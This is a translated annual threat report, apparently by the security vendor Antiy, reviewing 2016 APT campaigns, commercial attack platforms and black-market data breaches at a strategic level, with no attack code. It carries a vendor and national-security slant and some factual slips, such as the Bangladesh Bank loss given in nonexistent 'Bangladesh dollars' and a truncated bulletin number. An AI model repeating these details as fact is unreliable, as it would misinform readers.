A Review and Outlook on Cybersecurity Threats in 2016
1. Striving to Make Our Thinking Relevant to the Times (Introduction)
In the development of China’s cybersecurity, 2016 was marked by numerous milestones: General Secretary Xi Jinping delivered an important speech at the Cyberspace Affairs Work Conference on April 19; the Cybersecurity Law was formally adopted, emphasizing the comprehensive strengthening of defenses for critical infrastructure; and the 13th Five-Year Plan put forward the new requirement of “independence and advancement”… A clear horizon for the future is unfolding in the distance. For China’s cybersecurity professionals, if the past decade or so of trial-and-error progress was more akin to a process of gathering strength for this “great era”, then 2016 officially raised the curtain on a new era. Whether for “optimistic stalwarts”, “pessimistic quitters”, or “temporary transitioners”, this era has truly arrived.
Against this backdrop, the official release dates of Antiy’s annual “Antiy Basic Threat Annual Report” and “Antiy Mobile Threat Annual Report”, which they have consistently adhered to, have been repeatedly postponed. The Mobile Threat Annual Report was finally released on March 10th. The release of the Basic Threat Annual Report comes a full 90 days after we distributed a pre-release version to participants at Antiy’s 4th Cybersecurity Winter Training Camp in January of this year. In other years, such delays and constant revisions might have stemmed from our respect for technology and vigilance against threats. However, this time, our repeated revisions reflect our self-reflection and examination: have our actions kept pace with our thinking, and are our thinking adapted to this era?
Since 2014, we have set a self-imposed requirement for “viewpoint-based annual reports”. We need our own perspective, stance, and analytical predictions. We abandoned the traditional template-based “statistical” annual reports constructed from backend malware data output. We are well aware that those “spectacular” statistical statistics, precise down to behavior and static labels, while seemingly impressive, lack sufficient reference value. Using the number of scans to measure threat severity, while still effective for some types of risks, is a product of the worm and DDoS era, masking more serious and insidious threats. But is simply having this awareness of viewpoint-based annual reports enough? We looked back at Antiy’s own annual reports from previous years. Amidst descriptions filled with idioms like “complete shift”, “increasingly serious”, “constantly emerging”, and “coming one after another”, did they truly reveal the current state and trends of the threats?
In this annual report, we very cautiously and soberly present the following thoughts and viewpoints:
The history of “APT behavior” predates the history of the term “APT. ” The “frequent occurrence” of APT incidents we see today is largely due to increased media attention and the focus of security resources on APT attacks. We believe the most accurate description of the trend in APT attacks is that they are a common occurrence in cyberspace, with the increase primarily driven by emerging target scenarios and the continuous entry of new players.
APT attack focus to critical information infrastructure is both a trend and an established fact. For super attackers, critical information infrastructure has always been a key target of APT attacks. These attacks revolve around continuous information acquisition and battlefield pre-preparation. In this process, CNE (Cyber Network Exploitation) behavior is a prerequisite for CNA (Cyber Network Attack).
Commercial attack platforms, commercial Trojans, and vulnerability exploitation tools have significantly reduced the cost of APT attacks while increasing the difficulty of tracing them. The proliferation of commercial weapons first leads to chaos at the bottom of the pyramid, and uncontrolled commercial weapons are more conducive to consolidating a single-level world.
Generalizing the concept of APT to all attacks using sophisticated methods and techniques is irresponsible. APT analysis without intent and determination to attack is not reliable. On the contrary, sophisticated cyberattacks do not necessarily use sophisticated techniques and equipment. APT attackers hijacking ordinary malicious code, including completely disguising themselves as ordinary cybercriminals, may become a trend.
IT development, incomplete IT infrastructure and the “small-scale production” approach to IT construction have resulted in serious inherent deficiencies in architectural security and passive defense, which is one of the fundamental reasons for China’s insufficient risk response capabilities. We not only need to guard a long and vulnerable border, but also possess numerous “defense islands” and scattered points. Without further synchronized development of IT and security, and without “security and development advancing in tandem”, effective security defense will remain impossible.
Simply following the practices of Silicon Valley’s security industry is insufficient to effectively address the APT risks faced by China. Silicon Valley’s security explorations largely focus on proactive defense and enhanced threat intelligence, given that basic security investments by government and enterprise clients in developed countries have already yielded substantial value. However, advanced security measures divorced from these fundamental capabilities are ineffective. From a specific risk countermeasure perspective, the physical advantages of super-attackers on the channel side, combined with their operational characteristics that integrate traditional human and electromagnetic capabilities, significantly diminish the detection value of C&C and file hash beacon-type threat intelligence.
The combination of “physical isolation, the assumption of good faith, and regulations” creates a false sense of security and serves as a form of self-reassurance. While network segmentation strategies and isolation measures are undoubtedly necessary security measures, they may pose even greater security risks if not accompanied by stronger internal network security policies. Security policies and investments must be implemented on the premise that the internal network has already been breached and that “insiders” are already present.
The individual tragedies caused by the black market’s big data are just the tip of the iceberg. The current total amount of data loss has already created a near-universal profiling capability, enabling “threat intelligence counter-operation” and establishing high-precision single-point strikes, thus posing significant national security risks. The fragmentation of uncontrolled information assets without information collection and the lack of a clear accountability system are the main reasons for the accelerated risk.
Traditional Windows PCs has begun to decline, while malware in emerging scenarios such as mobile continues to accelerate. At the same time, the stealth and anti-analysis capabilities of advanced malware are constantly improving across various platforms.
Threat intelligence is not just a defensive resource; it is also intelligence about threats, a shared domain for both attackers and defenders. The same data can be rules and clues for the defender, but attack resources and traces for the attacker.
“Extortionists” represent a prevalent and concerning type of malicious code activity. From its early origins as email malware, it has evolved to overlap with botnets, worms, website penetration, intranet propagation, and mobile viruses, impacting not only individual users but also government and enterprise networks. It is no longer just a type of malware but has become a typical example of a black market economic model.
The widespread worm infection incidents involving IoT devices should not be viewed simply as springboards for DDoS attacks. The compromised devices themselves possess greater resource depth value, which is more dangerous than using them in DDoS attacks. The widespread vulnerability of IoT devices poses more insidious and greater risks to social and national security; these risks are simply less easily perceived.
Today, from the perspective of supply chain security, many still adopt an “indirect route” from upstream to downstream. Supply chain defense, as an extension of high-value scenario defense, has gradually been accepted by security managers. However, it is insufficient to simply view supply chain risks as external risks to achieving key objectives. The supply chain is not only an entry point for attacks but also a crucial target in itself. The main battlefield for cyberspace attack and defense in the future will revolve around “supply chain” and “big data”.
Faced with threats and challenges, Antiy will choose to become a security vendor with a systematic vision and solutions. Based on its independently developed core technologies and products for threat detection and defense, Antiy will promote the effective integration of proactive defense, threat intelligence, architectural security, and passive defense. Antiy aims to provide attackers with unpredictable security capabilities at difficult-to-bypass attack points, achieving effective protection, high automation, and actionable security business value. This will be the path Antiy has chosen for the future.
2. The Prevalence of Advanced Persistent Threats (APTs) Is a Common Occurrence in Cyberspace
Figure 1 Temporal and Geographic Distribution of APT Incidents That Occurred and Were Disclosed in 2016
The year 2016 began in the aftermath of the cyberattack on Ukraine’s national power grid. In the months that followed, security firms around the world disclosed numerous APT incidents, such as Blockbuster, OnionDog, and C-Major; In July, the “Patchwork” group became the focus of widespread attention, with multiple security firms releasing analysis reports on the organization; by year’s end, as the “Shadow Brokers” continued to leak new information and security firms like Antiy released their stockpiled reports, the full scope of the “Equation” group’s capabilities across all platforms was gradually pieced together. However, as more incidents are examined along their chronological timeline, it becomes clear that using clichés like “increasingly severe” or “becoming a trend” to describe APT attacks is actually irresponsible. The frequent exposure of APT attacks is largely due to the fact that, after becoming the focus of international media attention, they attracted more security analysis resources. Although the term “APT” was first coined in 2006, when applying this standard to assess older attack activities (such as the Equation Group’s attacks on global server nodes beginning in 2000), we can conclude that APT attacks have always been a constant presence in cyberspace. The future growth in such attacks will primarily stem from two factors: First, the increasing digitization of both emerging critical information infrastructure and traditional infrastructure; second, the lowering of barriers to entry for new attackers due to the expanding attack surface and decreasing costs of launching attacks. At the same time, the detection, tracing, exposure, and containment of APT attacks across the entire network have also become routine countermeasures.
2.1 Critical Information Infrastructure Is a Primary Target of APT Attacks
Although the “attack on Ukraine’s power grid”[1] occurred in late 2015, it was not until early 2016 that teams such as SANS ICS[2], ESET[3], and Antiy completed a thorough analysis of the incident. Several related incidents involving intrusions at Ukrainian airports, mining companies, rail transit systems, and television stations were also gradually exposed in early 2016. Similarly, the “Stuxnet” incident from a decade ago—which also drew global attention for its use of cyber methods and malicious code to attack critical infrastructure—serves as a useful point of reference. It demonstrates that as the internet integrates more rapidly with critical infrastructure, while bringing improvements in efficiency, cost reductions, and service convenience, the attack surface of critical infrastructure continues to expand, and the cost of launching attacks continues to decline. In its special report, *Comprehensive Analysis Report on the Attack on Ukraine’s Power Grid* [1], Antiy conducted a comparative analysis of the key elements of these two incidents:
* Note: Although Stuxnet was exposed in 2010, its implementation began in 2006, so we refer to it as ten years ago.
Table 1 Comparison Between the Stuxnet Attack and the Attack on the Ukrainian Power System
| Stuxnet Incident | Attacks on Ukraine’s Power System | |
| Main Attack Target | Iranian nuclear industrial facilities | Ukraine’s power system |
| Associated with the Target of the Attack | Foolad Technic Engineering Co. (This company manufactures automation systems for industrial facilities in Iran) Behpajooh Co., Elec & Comp., Engineering (Develops industrial automation systems) Neda Industrial Group (a company that provides automation services for the industrial control sector) Control-Gostar Jahed Company (Industrial Automation Company) Kala Electric (a major supplier of uranium enrichment centrifuge equipment) | Kyiv Boryspil Airport, Ukraine’s largest airport Ukrainian mining company Ukrainian railway operators Ukraine’s state-owned power company, UKrenergo Ukraine’s TBS television station |
| Target | Host computer (Windows, WinCC), PLC control system, PLC | Office computer (Windows), host computer (Windows), Ethernet-serial gateway |
| Consequences | It delayed Iran’s nuclear program, causing it to miss a historic opportunity to become a nuclear-armed state. | Widespread power outage in Ukraine’s Ivano-Frankivsk region |
| Core Attack Principle | Modify centrifuge pressure parameters and centrifuge rotor speed parameters. | By controlling the SCADA system, you can directly operate the interface and issue power-off commands. |
| Use Vulnerabilities | MS08-067 (RPC remote execution vulnerability) MS10-046 (Shortcut file parsing vulnerability) MS10-061 (Printer spooler service vulnerability) MS10-07 (Kernel-mode driver vulnerability) MS10-092 (Task Scheduler Vulnerability) WinCC password hard encoding | No findings |
| Attack Entry Point | USB ferry Personnel implantation (speculation) | Sending emails containing malicious macro code |
| Pre-Construction Information Collection and Environmental Pre-Configuration | Possibly related to Duqu and Flame | Integrated data collection and strike |
| Communication and Control | A highly secure encrypted communication and control system | Relatively simple |
| Malicious Code Module Situation | The large and sophisticated modular system has a high degree of reusability. | The modular system is reusable. |
| Anti-Analysis Capability | High-strength local encryption, complex calling mechanism | Relatively simple and easy to analyze |
| Digital Signature | Stealing digital signatures from three major vendors | Digital signatures not used |
| Attack Cost | Extremely high development costs Extremely high maintenance costs | Relatively low |
The joint analysis team led by Antiy concluded that this was a cyberattack targeting power infrastructure; using malicious code such as BlackEnergy as the primary attack tool; conducting preliminary data collection and environmental pre-configuration through a Botnet system; sending malicious code payloads via email as the direct entry point for the final attack; issuing commands to remotely control SCADA nodes to cut off power; achieving delayed recovery and state blinding by destroying and damaging the SCADA system; and using DDoS service calls for interference, ultimately achieving a prolonged power outage and creating social chaos—a cyberattack of information warfare caliber. The “attack on the Ukrainian power system” fully illustrates the vulnerability of modern social infrastructure. While the attack equipment may seem less sophisticated compared to Stuxnet from a few years ago, it still achieved its tactical mission. If A2PT (Advanced Persistent Threat) attacks like Stuxnet showcase more about zero-day attacks, complex and robust encryption strategies, PLCs, and firmware, then the “victory” of the attack on the Ukrainian power system was achieved by the attackers without using any zero-day attacks or attack components located on the production system side, but solely through malicious code operating on the PC. From a cost-effectiveness perspective, this is an operation that better illustrates the “violent aesthetics” of war.
Figure 2 Summary of the “Attack on the Ukrainian Power Grid” Incident
The cyberattack on the Central Bank of Bangladesh, which resulted in the theft of 81 million Bangladesh dollars, was a widely publicized attack on financial infrastructure in 2016. Following this, other cyberattacks targeting banks’ SWIFT systems were gradually revealed. Among domestic security vendors, 360 Enterprise Security conducted more analysis and disclosure than Antiy. The attacking group was very familiar with the target bank’s business processes and conducted a long-term, highly targeted, and continuous analysis of the target. Through the analysis of the malware origins of the Central Bank of Bangladesh and Tien Van Bank in Vietnam, it can be inferred that the attacking group is related to the Lazarus organization.
In the hack of the Central Bank of Bangladesh, attackers gained access to the SWIFT system and executed business operations through cyberattacks. They bypassed security verification by modifying SWIFT ‘s verification code with malicious code and tampered with message data to conceal illegal transfers. The effective use of these attack methods fully exposed the inherent security vulnerabilities of the banking system. Traditional banks rely heavily on closed physical isolation for security. However, with the continuous development of online finance, the increasing number of transaction and payment gateways, numerous dispersed ATM nodes, and more interbank remittances have made cyberattacks on banks a widespread reality, far more than a prediction.
The protection of critical information infrastructure should be prevented before it occurs, rather than relying entirely on “incidents” to drive it. Many attacks against critical information infrastructure are highly covert, and these attacks revolve around continuous information acquisition and battlefield pre-preparation. In this process, CNE (cyber intelligence exploitation) behavior is normalized and is a prerequisite for CNA (cyber attack).
2.2 Hybrid Attacks Combining Online and Offline Methods Are Common in Advanced Cyberattacks
Another important characteristic of the “attack on the Ukrainian power system” is that the attackers used a combination of online and offline methods. They caused infrastructure failures through cyberattacks, while simultaneously interfering with emergency response capabilities and increasing recovery costs by launching denial-of-service attacks on emergency response telephone lines.
Figure 3 Diagram of Online and Offline Attack Operations in the “Attack on the Ukrainian Power Grid” Incident
The “Equation Group” was discovered in 2009 to be using offline attack methods to extend its operations. They would mail CDs containing malicious code disguised as normal meeting materials, infect target hosts through the CD’s self-booting code, and then complete the entire attack through a series of online attacks.
As our understanding of risks deepens, extending from the internet to cyberspace, we need to see our traditional thinking—separating the security of the virtual world from that of the physical world—and our traditional obsession with clearly defining cyber risks and real-world risks, will be shaken. What we will see are simply the various attack methods employed by attackers to achieve their objectives. Whether the attack is purely network-based or combines traditional physical and electromagnetic means in its attack path is merely a matter of weapon selection by advanced attackers.
From the perspective of the evolution of security threats, traditional physical space and cyberspace have always been interconnected. Early hacker attacks on mainframe systems often relied on infiltrating offices to conduct reconnaissance, much like Kevin Mitnick disguising himself as a cleaner to steal computer manuals in the last century. However, with the widespread adoption of the internet, this reconnaissance gradually overcame geographical limitations and decreased in cost. The convergence of cyberattacks and traditional attacks follows two paths. For those accustomed to working online, cyberattacks are merely a way for attackers to gain psychological security, gradually leading them to confront cyber risks and threats head-on as they test the limits of social and legal boundaries. On the other hand, traditional terrorist organizations and criminal gangs are constantly seeking new opportunities. When there is sufficient overlap between the two, the convergence of these two evils becomes inevitable.
In future cyberspace competition, combined online and offline attacks will become increasingly common.
2.3 Cybersecurity Capabilities Are Ultimately Tested by Attackers and Eavesdroppers
Currently, countries around the world have implemented numerous cybersecurity inspection and assessment systems to identify security issues and improve security capabilities. However, advanced cyberattacks continue to succeed. While compliance security checks and measures are essential, they cannot replace real-world testing. In China’s response to overseas APT attacks, we also face the reality that, from a technical perspective, even attackers with limited capabilities can pose a significant threat.
July 10, 2016, based on four years of continuous surveillance and tracking, Antiy exposed the “White Elephant” attack group and released the article “The White Elephant’s Dance – Cyberattacks from the South Asian Subcontinent”. [4] The sample of this attack group was first captured and discovered by Antiy in July 2012. In May 2013, Norwegian security vendor Norman named this group HangOver and determined that the main target of this group was Pakistan, which also threatened China to a certain extent. Antiy called the group “White Elephant”. Through continuous analysis, Antiy found that the main attack direction of this attack group has shifted from Pakistan to China, which reflects the change in the strategic goals and strategic stages of the relevant attack group and the country behind it. The attack wave capability of this group in 2016 was significantly improved compared to the previous one. Therefore, Antiy called this wave of attacks “White Elephant Generation II”. “White Elephant Generation II” is more advanced in technical means than “White Elephant Generation I”. The improvement in the overall and technical capabilities of its attack operations may lead to an increase in the success rate of the attack. And its use of more violent and barbaric delivery methods makes its number of attacks and the scope of its impact far greater than that of “White Elephant Generation I”.
Table 2 Comparative Analysis of “White Elephant Generation 1” and “White Elephant Generation 2”
| White Elephant Generation 1 | White Generation 2 | |
| Main Threat Targets | Large-scale targets in Pakistan and a few targets in China (such as universities). | Large-scale targets in Pakistan and China, including various targets related to education, military, scientific research, and media. |
| Preemptive Attack Methods | Spear-phishing emails, including direct attachments. | Spear-phishing emails send links to documents containing formatted vulnerabilities. |
| Types of Stolen Files | *.doc *.docx *.xls *.ppt *.pps *.pptx *.xlsx *.pdf | *.doc *.docx *.xls *.ppt *.pptx *.xlsx *.pdf *.csv *.pst *.jpeg |
| Social Engineering Skills | The PE file uses double extensions and embeds images, which are then disguised as military intelligence documents or court judgments; the process is rather crude. | The forgery of relevant military and political information was quite sophisticated. |
| Use Vulnerabilities | Not seen in use | CVE-2014-4114 CVE-2012-0158 CVE-2015-1761 |
| Binary Attack Payload Development and Compilation Environment | VC, VB, DEV C++, AutoIT | Visual C#, AutoIT |
| Binary Attack Payload Packing Situation | A small number of people use UPX | No shell |
| Digital Signature Theft / Counterfeiting | Not seen | Not seen |
| Speculation on the Size of the Attacking Organization | 10-16 people, with varying skill levels. | A small squad with high attack capabilities |
| Threat Consequence Assessment | Caused certain threatening consequences | It may cause serious consequences. |
Through long-term and in-depth analysis, Antiy tracked down clues about the attack organization and created an attacker profile based on publicly available information on the Internet, concluding that it was an attack group consisting of 10 to 16 people.
Figure 4 Profile of the “White Elephant Generation 1” Attack Group
Over the past few years, China’s information systems and users have faced continuous challenges from multi-party cyber intrusions. These attacks employ a variety of sophisticated (and seemingly less sophisticated) techniques, primarily targeting the acquisition of confidential information, research findings, and other secrets. These attack groups have persisted in critical infrastructure and information systems for extended periods, aiming to steal secrets and gain greater operational initiative. The potential threat and the depth of their impact far surpass those of website tampering or traditional DDoS attacks. These attacks also exhibit different methods and characteristics depending on the strategic intent, capabilities, and priorities of the perpetrators. While Chinese users are more concerned about attacks from a superior, overarching perspective, our analysis of “White Elephant” reveals that cyberattacks from countries and regions with competing geopolitical interests also pose significant risks and challenges to China’s informatization. Moreover, while these attacks often appear somewhat crude, they are more frequent, direct, and persistent.
For attack groups like “White Elephant”, lacking networks and electromagnetic capabilities for cover, they rely more on internet entry points like email. From a holistic defense perspective, this could be a point that can be tightened, but for a society with insufficient basic perception, detection, and defense capabilities, such targeted remote attacks are highly effective and will be overwhelmed by a large number of other non-targeted security incidents.
A current situation warrants reflection: advancing and conducting cybersecurity exercises in a state of “no adversaries”. The combination of “physical isolation + the assumption of good guys + prescribed scenarios” creates a false sense of security and self-comfort. While network partitioning and isolation measures are undoubtedly essential and necessary security strategies, they may pose greater security risks if not accompanied by stronger internal network security strategies. Security strategies and investments must be implemented based on the premise that the internal network has been penetrated and an “insider” already exists.
A great power’s defense capabilities are guided by design, based on industry, and complemented by investment, but ultimately their true level must be tested in real confrontations with attackers and spyers.
2.4 The Attack Payload of the Advanced Cyberattack Group Is Capable of Targeting All Platforms
Following Kaspersky and Antiy’s analyses and exposure of the malware used by the Equation Group in early 2015, the group resurfaced in a series of events in 2016. In August and October 2016, a hacker group calling itself the “Shadow Brokers” released information suggesting a connection between the Equation Group and the ANT attack equipment previously exposed by Snowden, demonstrating its ability to inject and persist malware into firewalls such as Cisco, Juniper, and Fortinet. Shadow Brokers revealed that the Equation Group had been compromising numerous servers worldwide since 2000, including some versions of Solaris and Oracle-owned Unix operating systems. Although no concrete evidence was provided, this corroborated Antiy’s analysis, revealing a near-omnipresent, platform-wide attack capability of this super-attacking group. In response, Antiy released “From “Equation” to “Equation Group”—An Analysis of the Cross-Platform Capabilities of the EQUATION Hacking Group’s Advanced Malware” on November 4, 2016.[5] The report exclusively analyzed its attack samples on the Solaris and Linux platforms, which is the first publicly available analysis in the industry to officially confirm the existence of these “evil spirits”.
Figure 5 Global Server Intrusions by the Equation Group, As Revealed by Shadow Brokers Between 2000 and 2010
Over the past few years, this analysis has been so lengthy, complex, and difficult that it has exceeded the challenges we faced in analyzing and reproducing Stuxnet and Flame. This highly complex, stealthy, and versatile advanced malware presents a significant challenge to both victims and analysts. Especially when its attack scope covers almost all architectures and operating systems, traditional security analysis teams, which are more adept at analyzing malware on mainstream operating system platforms such as Windows, Linux, and Android, have clearly felt immense pressure and challenges. If we use the organization’s name, “Equation”, as an analogy to describe the difficulty of the analysis, what we need to crack is no longer just a single “equation”, but a more complex system of multiple equations. By reviewing the main analytical results and revelations about the “Equation” group, we can see a chart illustrating the organization’s multi-platform operating system coverage capabilities:
Table 3 Multi-Platform Operating System Coverage Capabilities of the Equation Group
| Information | Windows | Linux | Solaris | Oracle-owned Unix | FreeBSD | Mac OS |
| Antiy: A Trojan That Modifies Hard Drive Firmware: Exploring the Attack Components of the EQUATION Group[6] | Analysis of sample payload and disk persistence capabilities | |||||
| Antiy: Analysis of Encryption Techniques in Some Components of the Equation[7] | Analyzing encryption algorithms | |||||
| Kaspersky: Equation: The Death Star of Malware Galaxy [8] | Unveiling the Equation Attack Organization | |||||
| Kaspersky: A Fanny Equation: “I am your father, Stuxnet” [9] | Fanny Component Analysis | |||||
| Kaspersky: Equation Group: from Houston with love [10] | Doublefantasy Analysis | |||||
| Kaspersky: EQUATION GROUP: QUESTIONS AND ANSWERS[11] | Equation Organization: Questions and Answers | Guess | ||||
| The Hacker News: Shadow Brokers reveals list of Servers Hacked by the NSA | Exposure exists | Exposure exists | Exposure exists | |||
| Antiy: From “Equation” to “Equation Group” An Analysis of the Cross-Platform Capabilities of the EQUATION Hacking Group’s Advanced Malware [5] | Exposure exists, analysis phase load | Formal existence analysis related loads |
Note: Antiy’ analysis of the User Agent in the Solaris sample revealed that it had the Solaris identifier, while Kaspersky disclosed in “EQUATION GROUP: QUESTIONS AND ANSWERS” that it had captured information about the User Agent of Mac OS X. Therefore, although Antiy, Kaspersky and other vendors have not yet captured Mac OS X samples, the Equation Group’s attack payloads targeting Mac OS X are real.
Antiy hopes to demonstrate to users through its work that the various reports about super-attack groups’ ability to cover all platforms are not just rumors, but a real threat and an established fact. This weapon is used not only to attack traditional high-level targets within isolated networks, but also to attack internet nodes.
In China’s security defense practices, there’s a preconceived notion that due to various regulations and constraints, nodes exposed to the internet, and even internal networks with internet access, do not store high-value information. The idea that “all valuable information resides within isolated networks” is a beautiful vision and imagination, but not the reality of this era of massive information generation and rapid flow. Furthermore, in the era of big data, the definition and scope of high-value information are constantly evolving. More information assets are inevitably distributed within public network systems, and the spying and attacks on these assets are continuously increasing. Super-attack organizations are the instigators and long-term practitioners of such attacks.
An intrusion into a DNS server can facilitate the injection of malicious code and the interception of communications targeting other network assets; an attack on a mail server can allow attackers to intercept all of a user’s email communications; and establishing a persistent presence on an ISP’s backbone node can be used to obtain comprehensive information, including achieving what the Camberdada [12] project described as an “easy win”.
Note: Project Camberdada is a surveillance operation plan exposed by Snowden. The relevant agencies monitored emails sent by users to antivirus vendors through persistent nodes of operators in order to discover whether their attacks were exposed and to capture and reuse samples deployed by other parties.
As we summarized earlier, these super-attack groups possess “organized cyberattack teams, a massive support engineering system and a standardized arsenal of attack tools, powerful vulnerability collection, analysis and mining capabilities, related resource reserves, and systematic operating procedures and manuals. Their equipment system covers all scenarios, their vulnerability exploitation tools and malicious code payloads cover all platforms, and their persistence capabilities cover all stages. Faced with such a systematic attack, which is both industrial-grade and highly targeted, the ‘perpetual motion machine’ is destined to stall, and the ‘silver bullet’ is destined to fail. To achieve effective defense and trace the source, only a clear strategy, sufficient cost investment, and a systematic defense against a systematic attack, through long-term, arduous, and solid work and capacity building, can gradually gain the initiative”.
2.5 Commercial Cyber Weapons Further Reduce the Cost of APTs
In the context of cybersecurity, “commercial weapons” refer to attack platforms, malicious code, vulnerabilities and their exploitation tools, as well as other tools or components used to facilitate attacks, which are sold and traded as commercial products and possess weapon-grade capabilities. These include commercial attack platforms such as Cobalt Strike, as well as exploit kits such as RIG and Magnitude. In “Analysis of Samples from a Quasi-APT Attack Targeting Chinese Government Agencies”[13], Antiy thoroughly analyzed the role played by the commercial attack platform Cobalt Strike in the attack and pointed out that “commercial attack platforms eliminate the need for attackers to incur high costs for developing malicious code; these platforms also provide attackers with a wide range of injection methods and supporting techniques for loading and persisting malicious code. This approach reduces the cost of attacks, enabling nations and organizations lacking substantial funding or elite hackers to carry out near-APT-level attacks by relying on services provided by existing commercial attack platforms; moreover, such highly ‘formulaic’ attacks lack distinctive signatures, making them harder to trace. “Throughout 2016, traces of Cobalt Strike were repeatedly observed in APT attacks targeting China, and our industry partner 360 Enterprise Security published a follow-up analysis report on this [14].
Commercial arms typically have the following characteristics:
- At the level of a weapons-grade product.
Commercial weaponry is not simply malicious code or vulnerability intelligence; it comprises weapon-grade attack equipment. Take Cobalt Strike, for example. While it claims to be a commercial version of the open-source vulnerability testing platforms Metasploit and Armitage (Metasploit ‘s graphical interface), its payload capabilities are designed entirely for real-world use. It can deliver payloads covering all operating system platforms, includes a large number of constructible overflow formats, and enables payloads to achieve non-local sample delivery, encrypted data transmission after theft, and remote encrypted control. It is not a typical vulnerability scanning and testing platform, nor is it the target missile that arms manufacturers describe it as; it is a real missile with combat objectives.
- High-value-added transactions are the link that maintains the supply and demand relationship in the commercial arms trade.
While commercial weaponry repeatedly appears in APT attacks, its supply is a commercial activity, not an official act by attack groups like TAO. Furthermore, although the trade in Trojans and vulnerabilities has always existed, commercial weaponry is not the low-quality trading of Trojans or the acquisition of vulnerabilities typical of traditional black market activities. Instead, it represents high-quality attack equipment “commodities”, making such transactions both high-value-added and scalable. For example, it provides actual and effective capabilities, including 0-day exploit tools, rather than basic vulnerability information or Proof-of-Concept (POC). Its Trojans often possess a high degree of modularity and rootkit capabilities.
- Commercial arms manufacturers often have certain political and economic backgrounds.
Take Raphael Mudge (USA), the creator of Cobalt Strike, for example. He was a security researcher and penetration tester for the US Air Force, and was deeply involved in the Red Team project.
Table 4 Raphael Mudge’s Resume
| Company / Project / Organization | Position | Time |
| Strategic cyber LLC | Founder and Director | 2012.1- present |
| Delaware Air National Guard | Leader, Reserve Officer | 2009- present |
| Cobalt strike | Project Manager | 2011.11-2012.5 |
| TDI | Senior Security Engineer | 2010.8-2011.6 |
| Automattic | Code Wrangler | 2009.7-2010.8 |
| Feedback Army, After the Deadline | Founder | 2008.7-2009.11 |
| U.S. Air Force Research Laboratory | Systems Engineer | 2006.4-2008.3 |
| U.S. Air Force | Communications and Information Officer | 2004.3-2008-3 |
- Capability flows in the context of commercial arms manufacturing complicate threats.
One characteristic of information weapons is that their replication cost is almost zero. The flow of commercial arms capabilities exhibits certain patterns. On the one hand, events such as Snowden’s leaks and the revelations by “Shadow Brokers” have provided commercial arms with more advanced reference models and templates. On the other hand, events such as the Hacking Team information leak have enabled commercial arms capabilities to quickly reach the level of the underground black market in a short period of time.
Commercial arms sales, to some extent, are sold as security products for “offense-based defense”, but their impact on information security differs significantly between developed and developing countries. For information systems that have long implemented the defense-in-depth concept, have made effective long-term investments in basic protection measures, and where proactive defense and threat intelligence have taken effect, the impact of commercial arms sales is limited. However, for the information systems of developing countries, it could be disastrous. Therefore, the proliferation of commercial arms sales first leads to chaos at the bottom of the pyramid, and uncontrolled commercial weapons are more conducive to consolidating a unipolar world.
Figure 6 Scope of Commercial Cyberweapons in Cyberattacks
2.6 APT Attacks Do Not Necessarily Use Advanced Attack Equipment and Methods
APT attacks are more easily associated with advanced attack methods, such as the development of proprietary attack tools, the purchase of commercial weaponry, or the use of stolen digital signatures and exploits of unique or purchased vulnerabilities. Because the attack tools and methods used in APT attacks are exposed, they are imitated by other attack groups, underground black market supply chains, and ordinary hackers, making APT attack techniques commonplace. Conversely, APT attacks aim to achieve their objectives, with the ultimate goal of causing damage or stealing information from targeted individuals; the attack tools and methods used to achieve this ultimate goal are not necessarily advanced.
According to the report “GRIZZLY STEPPE – Russian Malicious Cyber Activity” [15] released by the U.S. Department of Homeland Security (DHS) and the National Cyber Security and Communications Integration Center (NCCIC), the attackers used traditional spear-phishing email attacks and watering hole attacks. The payloads they delivered were Office documents with malicious macro code and RTF format files that used known vulnerabilities to embed malicious code. The malicious code installed on the target host was a conventional remote control tool. With such seemingly ordinary attack equipment and techniques, the attacking organization attempted to influence the political balance by unilaterally revealing information. Just as in physics, force has three elements: magnitude, direction, and point of application, seemingly the same attack techniques and methods can produce completely different effects when applied to different work surfaces. Therefore, the core of APT judgment is still the work background and the determination of the attacking organization. It is irresponsible to generalize the concept of APT to some non-targeted attack behaviors that use advanced means and techniques. APT judgment without attack intent and attack will is unreliable.
3. Massive Data Breaches Lead to “Threat Intelligence Misuse”
The Yahoo! data breach involving 500 million accounts was a landmark data breach of 2016, resulting in over 20 class-action lawsuits and the resignation of top executives. However, the breach actually occurred as early as 2014, only coming to light in 2016. This time lag represents a more frightening threat than the large-scale data breach itself: the covert use and sale of vast amounts of personal information, without users’ knowledge.
2016 wasn’t the year with the most leaks in history, the integration of related threats with various traditional forms of crime has become more profound. For example, in an attack against the IRS (Internal Revenue Service), attackers compromised PIN reset applications, obtained over 100,000 PINs, and attempted to submit fraudulent tax refund applications. In China, the shocking “Xu Yuyu incident” occurred, where her personal information was stolen and sold to fraud gangs, leading to her death after being defrauded of her tuition fees.
3.1 The Dark Web’s Big Data Has Already Reached a Level Where It Can Create Profiles of Nearly the Entire Population
The cybercrime industry has caused massive data breaches, with these huge amounts of sensitive data constituting the “black market big data”. Besides being used for targeted advertising, this black market big data is also abused by criminals, causing more serious and direct economic losses to internet users. Public service industries such as transportation, healthcare, education, finance, hotels, and logistics possess vast amounts of user information, making these sectors closely related to social life targets for the cybercrime industry. Figure 7 summarizes some of the data breaches that occurred in China in 2016, but the actual number of breaches is far greater. Behind all these incidents lies the cybercrime industry. Besides hackers breaching websites and stealing data, other methods used by cybercriminals include credential stuffing attacks, internal employee data theft, phishing websites, and malicious code theft.
Figure 7 Major Data Breaches in China in 2016
The theft of sensitive user data has become an industry, with clear divisions of labor across various business lines in the black market. These lines collaborate to form a multi-faceted profit chain that harms internet users. At the very top are hackers who possess the attack techniques. They are the most covert group in the entire industry chain, obtaining sensitive user information through vulnerability discovery, website penetration, database breaches, credential stuffing, and even the dissemination of malicious code. They then cleanse the data using various technical means, extracting valuable black market big data, which is then sold to downstream business lines. The midstream of the black market primarily uses the black market big data purchased from upstream to create specialized fraud “scripts”, employing social engineering to carry out specific fraudulent activities or targeted advertising. Downstream are the various peripheral organizations supporting the entire black market industry chain, such as money laundering and withdrawal gangs, card collecting gangs, and ID card selling gangs.
3.2 Threat Intelligence Is Also a Form of Intelligence Threat
Some argue that large-scale data breaches are also a source of threat intelligence, but the awkward part is that this data actually belongs to individual internet users, and its organization is essentially the asset of the breaching party.
